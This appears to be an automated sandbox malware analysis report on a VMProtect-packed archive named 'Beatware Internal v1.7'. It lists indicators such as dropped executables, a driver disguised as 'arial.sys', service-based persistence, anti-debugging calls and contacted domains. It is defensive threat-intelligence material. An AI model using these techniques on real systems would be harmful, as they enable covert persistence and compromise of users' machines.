Malware Analysis Report

2025-03-15 06:03

Sample ID: 240510-28kmfsab36
Target: Beatware_Internal_v1.7.rar
SHA256: ba58224021afc0386451f5f548183b70654c941873a924c55d8f804965c3a373
Tags: vmprotect, persistence
Score: 8/10


Analysis Overview

Score: 8/10
SHA256: ba58224021afc0386451f5f548183b70654c941873a924c55d8f804965c3a373
Threat Level: Likely malicious

The file Beatware_Internal_v1.7.rar was found to be: Likely malicious.

Malicious Activity Summary

Tags: vmprotect, persistence

Downloads MZ/PE file
Sets service image path in registry
VMProtect packed file
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Modifies registry class
Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported: 2024-05-10 23:15

Signatures

VMProtect packed file (tags: vmprotect)

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-05-10 23:15
Reported: 2024-05-10 23:17
Platform: win7-20240215-en
Max time kernel: 150s
Max time network: 132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe"

Signatures

VMProtect packed file (tags: vmprotect)

Description Indicator Process Target Occurrences
N/A N/A N/A N/A 3

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target Occurrences
N/A discord.com N/A N/A 7

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target Occurrences
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A 64

Enumerates physical storage devices

Modifies Internet Explorer settings (tags: adware, spyware)

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com\NumberOfSubdomains = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2C5A7B31-0F23-11EF-80DF-F60046394256} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009b106788dea7af4d98683a8983feb7c6000000000200000000001066000000010000200000003a793cea2cffcaac90a48eb1dfd98588b6737d7f07fee036fe5bdebb9418e21d000000000e80000000020000200000002037994b312bd8446285552e932fc1c91da368204923311edfbe0bccb44e5be290000000444332a8b96d376c0e08e6d8c773e82285e7d04723f21651b524fbf7ee4417310c2ce5cc835e271010aa17c5d1f31771fd7586ba9a8e65c2951d5725378fa918db2b9693b655113e0e26098ab9bb99871371e6bf5cdb7c7eec8d67bcd0098ab8f927d22c939dcb3489de8f6f2bc6a247052adbc860b23876f0e8cc98b986b217333659bacfa52a54788f2b29212b5cb74000000036dff0f5ff1d2348d7e00a6f5c95e751f4d89e9b035de6b3367b652fb5429df8ee8ad7d43f57c9da6828f6e288a8bfc4180a276e4114fa2a2c707d1978ef0ec9 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "421544789" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c01408f12fa3da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DOMStorage C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009b106788dea7af4d98683a8983feb7c600000000020000000000106600000001000020000000081861b93f957b506854386d8c3eba72e51a469e8dc3aff25ea1201492324195000000000e80000000020000200000008176574f10738f37fc3fa076466cf902c8215391c83eb25ef3967ace005e9d7e20000000e16549890d15e286ac11654fc5bf0637eb287afaee751029cc43e03e319891e640000000f1daf1b7011fd6039310bdd6ddf9ed3a994510a94f1466bca5ee216ef4f30b90d80b2d74774bbea20ae003166bb063543eaa2284068a4d778394673cfddfd7a4 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target Occurrences
PID 2912 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe 3
PID 2912 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe 3
PID 2468 wrote to memory of 2432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe 3
PID 2468 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe 3
PID 2468 wrote to memory of 2512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe 3
PID 2912 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe 3
PID 2912 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Program Files\Internet Explorer\iexplore.exe 3
PID 2912 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe 3
PID 2488 wrote to memory of 2544 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE 4
PID 2912 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe 3

Processes

C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe

"C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://beatware.xyz/discord

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2488 CREDAT:275457 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

Network

Country Destination Domain Proto Occurrences
US 8.8.8.8:53 keyauth.win udp 1
US 172.67.72.57:443 keyauth.win tcp 1
US 8.8.8.8:53 apps.identrust.com udp 1
US 2.18.190.80:80 apps.identrust.com tcp 1
US 8.8.8.8:53 x2.c.lencr.org udp 1
BE 23.55.97.11:80 x2.c.lencr.org tcp 1
US 8.8.8.8:53 beatware.xyz udp 1
US 104.21.71.116:443 beatware.xyz tcp 2
N/A 127.0.0.1:49201 N/A tcp 1
N/A 127.0.0.1:49203 N/A tcp 1
US 8.8.8.8:53 dsc.gg udp 1
US 172.67.156.126:443 dsc.gg tcp 2
US 8.8.8.8:53 r.dsc.gg udp 1
US 104.21.7.223:443 r.dsc.gg tcp 2
US 8.8.8.8:53 discord.gg udp 1
US 162.159.134.234:443 discord.gg tcp 2
US 8.8.8.8:53 discord.com udp 1
US 162.159.128.233:443 discord.com tcp 6
US 204.79.197.200:443 ieonline.microsoft.com tcp 2
US 8.8.8.8:53 www.microsoft.com udp 2
US 204.79.197.200:443 ieonline.microsoft.com tcp 1

Files

SHA1 6f4e73926ed432bb96db7b80c6393775aa9de9eb
SHA256 4464ea7e167fc79d7c6f850801b780ce441872ac1cfc11fd4ee41d2406e2c340
SHA512 0f21cf557bb2f7b775bb918893416d92601e7106e869481b2f52d68e8e3e4ea3a72dd73e3b665509f040c89653e346ad66d7f82dac9581490d093bdbf2c310b8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 233bf4c38c6751425f471e7234ac8548
SHA1 209696b99cbb2d1709baf3678b370801513c6c01
SHA256 0649d3d8ee09482fd54cbbc2b3df2814472f8f116eafb59c28f5513cb30ea115
SHA512 82ce2a40a5174ced46fd9e353650f5d2a7662c8f2b4d09875d3245cd6802ba8bcf4aa6aebd7d16bcdcc242c34211e490eb7d5e690f823f3e5b53fa5c4d6b24c1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2f3c3d75ebc75857be68ea00ee33f22f
SHA1 5d70d5240752791d02fa5109a5d761c50083b172
SHA256 7e4b435ac446039319274577350956846ee1f1e472b2ae6e11c7c8a3b28e720f
SHA512 dc5ee96dcf1b05609a499ab89ebca0aa626241cf75a35da00a9e028c4a80f8699259a6966d7ff4cf2d891483933e28bb804175eee038ddb4a9ba4b8509d7cb61

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d7c4a725ec0e9fc64f20a741605605af
SHA1 6bb9879569fc0cd236c0b80d65b1db074bd5fab8
SHA256 1f051bfebc36dea9d41b2f72a516e5964f99806846185acfec0582d883556574
SHA512 b3642b21d840a6e9d3678221120e93e50b41a56419905e32b0d89d723bf36cb4f1ca9c74a5bc7bac49cfd0887a07fb70a50922e90ec7ac095f87a41ae036fbdc

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-10 23:15

Reported

2024-05-10 23:16

Platform

win10v2004-20240508-en

Max time kernel

73s

Max time network

69s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe"

Signatures

Downloads MZ/PE file

Sets service image path in registry

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lntYyeTrEfNahTUmehqQzIIO\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\lntYyeTrEfNahTUmehqQzIIO" | C:\Windows\System32\gainlol.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\gainlol.exe | N/A

VMProtect packed file

vmprotect
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | discord.com | N/A | N/A
N/A | discord.com | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\System32\gainlol.exe | C:\Windows\system32\curl.exe | N/A
File created | C:\Windows\System32\internal.dll | C:\Windows\system32\curl.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\Fonts\arial.sys | C:\Windows\system32\curl.exe | N/A

Enumerates physical storage devices

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1337824034-2731376981-3755436523-1000\{667DCD50-3ED8-4FFB-A819-014180711166} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
